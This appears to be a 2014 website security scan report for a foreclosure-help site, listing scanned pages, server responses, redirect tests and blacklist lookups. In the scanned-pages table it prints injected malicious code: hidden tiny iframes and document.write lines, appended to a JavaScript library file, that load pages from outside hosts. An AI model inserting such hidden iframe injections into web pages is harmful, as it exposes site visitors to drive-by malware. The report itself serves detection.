Scanned pages/files
Request | Server response | Status |
http://stopforeclosurehelptips.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 15:38:22 GMT Location: http://www.stopforeclosurehelptips.com/ Server: nginx/1.6.1 Content-Length: 324 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.stopforeclosurehelptips.com/ | 200 OK Content-Length: 13387 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://ezcheck.de/counter.php <iframe src="http://ezcheck.de/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://www.stopforeclosurehelptips.com/ebook.html | 200 OK Content-Length: 20751 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?i=904198 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?i=904198> Hidden iFrame found. size: 10x10 style: hidden src: http://ezcheck.de/counter.php <iframe src="http://ezcheck.de/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://www.stopforeclosurehelptips.com/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://www.stopforeclosurehelptips.com/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://stopforeclosurehelptips.com/ebook.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 15:38:25 GMT Location: http://www.stopforeclosurehelptips.com/ebook.html Server: nginx/1.6.1 Content-Length: 334 Content-Type: text/html; charset=iso-8859-1 | clean |
http://stopforeclosurehelptips.com/bank | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 15:38:26 GMT Location: http://stopforeclosurehelptips.com/bank/ Server: nginx/1.6.1 Content-Length: 325 Content-Type: text/html; charset=iso-8859-1 | clean |
http://stopforeclosurehelptips.com/bank/ | 200 OK Content-Length: 13719 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?i=904198 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?i=904198> | ||
http://stopforeclosurehelptips.com/bank/greybox/AJS.js | 200 OK Content-Length: 10868 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=904198></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=904198></iframe>'); AJS={BASE_URL:"",drag_obj:null,drag_elm:null,_drop_zones:[],_cur_pos:null,getScrollTop:function(){ var t; if(document.documentE } _9d[k]=cur; } return new AJS.Class(_9d); },implement:function(_a0){ AJS.update(this.prototype,_a0); },_parentize:function(cur,_a2){ return function(){ this.parent=_a2; return cur.apply(this,arguments); }; }}; script_loaded=true; script_loaded=true; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ahc-service.de/wehf.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=904198 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=904198> Hidden iFrame found. The same iFrame was found in 93 websites. size: 2x2 src: http://ahc-service.de/wehf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ahc-service.de/wehf.html> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=904198 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=904198> | ||
http://stopforeclosurehelptips.com/greybox/AJS_fx.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 15:38:28 GMT Location: http://www.stopforeclosurehelptips.com/greybox/AJS_fx.js Server: nginx/1.6.1 Content-Length: 341 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.stopforeclosurehelptips.com/greybox/ajs_fx.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://www.stopforeclosurehelptips.com/greybox/ | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://stopforeclosurehelptips.com/greybox/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 15:38:29 GMT Location: http://www.stopforeclosurehelptips.com/greybox/ Server: nginx/1.6.1 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 | clean |
http://stopforeclosurehelptips.com/greybox/gb_scripts.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 15:38:30 GMT Location: http://www.stopforeclosurehelptips.com/greybox/gb_scripts.js Server: nginx/1.6.1 Content-Length: 345 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.stopforeclosurehelptips.com/greybox/gb_scripts.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21183 Content-Type: text/javascript | clean |
http://www.jstracker.com/track-http://stopforeclosurehelptips.com/bank/-language-1 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://www.jsbookmark.com/bookmark-1100011001-url-dynamic-description-.html | 200 OK Content-Length: 715 Content-Type: text/html | clean |
http://stopforeclosurehelptips.com/bankruptcy | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 15:38:31 GMT Location: http://stopforeclosurehelptips.com/bankruptcy/ Server: nginx/1.6.1 Content-Length: 331 Content-Type: text/html; charset=iso-8859-1 | clean |
http://stopforeclosurehelptips.com/bankruptcy/ | 200 OK Content-Length: 33672 Content-Type: text/html | clean |
http://stopforeclosurehelptips.com/bankruptcy/greybox/AJS.js | 200 OK Content-Length: 10396 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: stopforeclosurehelptips.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 28 Aug 2014 15:38:22 GMT
Location: http://www.stopforeclosurehelptips.com/
Server: nginx/1.6.1
Content-Length: 324
Content-Type: text/html; charset=iso-8859-1
...324 bytes of data.
GET / HTTP/1.1
Host: stopforeclosurehelptips.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 28 Aug 2014 15:38:22 GMT
Location: http://www.stopforeclosurehelptips.com/
Server: nginx/1.6.1
Content-Length: 324
Content-Type: text/html; charset=iso-8859-1
...324 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: stopforeclosurehelptips.com
Referer: http://www.google.com/search?q=stopforeclosurehelptips.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: stopforeclosurehelptips.com
Referer: http://www.google.com/search?q=stopforeclosurehelptips.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=stopforeclosurehelptips.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://stopforeclosurehelptips.com/
Result: stopforeclosurehelptips.com is not infected or malware details are not published yet.
Result: stopforeclosurehelptips.com is not infected or malware details are not published yet.